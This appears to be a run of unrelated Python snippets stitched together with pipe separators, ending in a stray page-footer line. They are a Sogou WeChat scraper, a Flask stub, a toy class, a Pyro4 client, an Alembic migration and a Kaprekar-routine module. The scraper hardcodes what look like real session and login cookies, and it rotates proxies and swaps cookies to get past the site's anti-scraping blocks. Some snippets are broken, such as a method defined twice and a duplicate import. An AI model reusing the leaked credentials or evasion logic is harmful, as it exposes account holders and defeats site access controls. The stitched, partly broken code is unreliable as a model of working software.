cookie = snuid + 'IPLOC=CN3603; SUID=478DA7275218910A000000005BB4C763; weixinIndexVisited=1; SUV=00151DF127A78D475BB4C764498BA456; JSESSIONID=aaaKzrDDD0iwcf7S_fWyw; SMYUV=1539481497473652; UM_distinctid=166703f6f890-0f89813641ce5e-333b5602-100200-166703f6f8a1a7; PHPSESSID=r6s9gp60p8bonj5nbn9ak42fg4; ld=CZllllllll2berZFlllllVsZLI1lllllJicb$kllll9lllll9klll5@@@@@@@@@@; LSTMV=246%2C75; LCLKINT=6255; ABTEST=0|1542511268|v1; ppinf=5|1542694165|1543903765|dHJ1c3Q6MToxfGNsaWVudGlkOjQ6MjAxN3x1bmlxbmFtZTo2OlV0b3BpYXxjcnQ6MTA6MTU0MjY5NDE2NXxyZWZuaWNrOjY6VXRvcGlhfHVzZXJpZDo0NDpvOXQybHVIUTk5LUFDd3Z1ZEFzSmJtckNhajk0QHdlaXhpbi5zb2h1LmNvbXw; pprdig=Ev03K1qUPEGid38Q2SatAOOTb4h9G4CDCGNIL5qTlajwdP4iFjwtcIqjKuRGNaLYGGokWecSiHeGAXQwWQm25skRiXqu8vRBACj9ejaxcTpV4lHuU_yIl5bs7OTsaaWyBx1wz9SCMPdqrFUKzSGgQN0PJ63IaDT5EQhyyTUKsVQ; sgid=16-37598605-AVvzpRVIQO87TxrZ9rdxtq4; SUIR=4F34C9486E6B15888DA7BE166F6E5369; SNUID=C226DF5F787C025C95C8952C79C3468F; sct=12; ppmdig=1542812932000000dda27b6ad31fee458e068a05ea2a6467'
self.params['Cookie'] = cookie
return self.params
def test_proxy(self):
"""
二次清洗代理
:return:健康代理
"""
global proxies
global headers
url = 'https://weixin.sogou.com/weixin?query=宝多六花&type=2&page=1&ie=utf8'
proxy = self.redis.proxy_random()
proxies = {
'http': 'http://' + proxy,
'https': 'https://' + proxy
}
try:
r = requests.get(url, headers=headers, allow_redirects=False, proxies=proxies)
if r.status_code == 200:
pass
else:
self.redis.proxy_decrease(proxy)
self.test_proxy()
except:
self.redis.proxy_decrease(proxy)
self.test_proxy()
def start(self, page):
global headers
global proxies
url = self.base_url %(self.keyword, page)
try:
response = requests.get(url, headers=headers, proxies=proxies, allow_redirects=False, timeout=20)
print('正在爬取:', url)
if response and response.status_code in VALID_STATUSE:
self.parse_index(response)
if response.status_code == 302:
headers = self.head(self.redis.snuid_pop())
response = requests.get(url, headers=headers, proxies=proxies, allow_redirects=False, timeout=5)
print('重新爬取:', url)
self.parse_index(response)
except:
self.test_proxy()
self.start(page)
def parse_index(self, response):
"""
解析索引页
:param response: 响应
:return: 新的响应
"""
doc = pq(response.text)
items = doc('.news-box .news-list li .txt-box h3 a').items()
for item in items:
url = item.attr('href')
self.redis.request_add(url)
print('添加url:', url)
def run(self):
"""
入口
:return:
"""
global headers
global proxies
headers = self.head(self.redis.snuid_pop())
self.test_proxy()
for i in range(1, 101):
self.start(i)
# self.schedule()
if __name__ == '__main__':
spider = Spider()
spider.run()
|
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
import os
baseDir = os.path.abspath(os.path.dirname(__file__))
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(baseDir, 'data.sqlite')
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
db = SQLAlchemy(app)
@app.route('/')
def hello_world():
return 'Hello World!'
if __name__ == '__main__':
app.run()
|
class Man:
def __init__(self, name):
self.name = name
self.x = 3
self.y = 3
def do_stuff(self):
return "What do you expect im " + self.name
def do_stuff(x):
return x + 3
|
import Pyro4
from accessor import Counter
from counter import Counter
c = Counter()
daemon = Pyro4.Proxy("PYRO:obj_4f9617d564a4482a97ced8ee97da3103@localhost:4040")
print daemon.register(c) |
"""empty message
Revision ID: 08bd50fb5714
Revises: f9829baa1eec
Create Date: 2019-03-08 21:00:21.413403
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '08bd50fb5714'
down_revision = 'f9829baa1eec'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('users', sa.Column('isActive', sa.Boolean(), nullable=False))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('users', 'isActive')
# ### end Alembic commands ###
|
"""Функция Капрекара
Wiki:
https://en.wikipedia.org/wiki/Kaprekar%27s_routine
"""
from typing import Tuple, Union, Generator
def kaprekar_function(number: int) -> Tuple[int, int]:
"""Функция Капрекара.
Совершает действие: вычислить разницу между числом,
состоящим из цифр исходного числа, стоящих по убыванию,
и числом, состоящим из цифр исходного числа, стоящих
по возрастанию.
Шаги прекращаются когда число совпадает
с постоянной Капрекара.
Подробнее см.: https://en.wikipedia.org/wiki/Kaprekar%27s_routine
>>> kaprekar_function(876)
(495, 5)
>>> kaprekar_function(3412)
(6174, 3)
:param number: исходное число
:type number: int
:return: пару чисел (x, y), где x - константа к которой
сходится исходное число, y - число шагов.
:rtype: Tuple[int, int]
"""
count = 0
old_n = 0
while number != old_n and number > 0:
old_n = number
digits = list(str(number))
increasing_numbers = int(''.join(sorted(digits, reverse=True)))
decreasing_numbers = int(''.join(sorted(digits)))
number = increasing_numbers - decreasing_numbers
count += 1
return old_n, count - 1 if count > 1 else count
def gkaprekar(start: int, stop: Union[int]=None, /) -> Generator[Tuple[int, Tuple[int, int]], None, None]:
"""Генератор для функции Капрекара.
Подробнее см. kaprekar_function.
>>> list(gkaprekar(5))
[(0, (0, 0)), (1, (0, 1)), (2, (0, 1)), (3, (0, 1)), (4, (0, 1))]
>>> list(gkaprekar(10, 15))
[(10, (0, 1)), (11, (0, 1)), (12, (0, 1)), (13, (0, 5)), (14, (0, 3))]
:param start: Когда функция вызывается с одним параметрам
этот аргумент означает правую границу
интервала [0, start). В случае вызова функции
с двумя аргументами, он характеризует левую
границу [start, stop).
:type start: int
:param stop: В случае вызова функции с двумя аргументами, stop
характеризует правую границу [start, stop).
:type stop: int
:return: Пары вида (i, K(i)), где i - проверяемое число,
K(i) - значение функции Капрекара (см. kaprekar_function).
:rtype: Generator[Tuple[int, Tuple[int, int]], None, None]
"""
if stop is None:
start, stop = 0, start
for i in range(start, stop):
yield i, kaprekar_function(i)
def main():
"""Демонстрация работы"""
for j, item in gkaprekar(10, 15):
print(j, item)
if __name__ == '__main__':
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.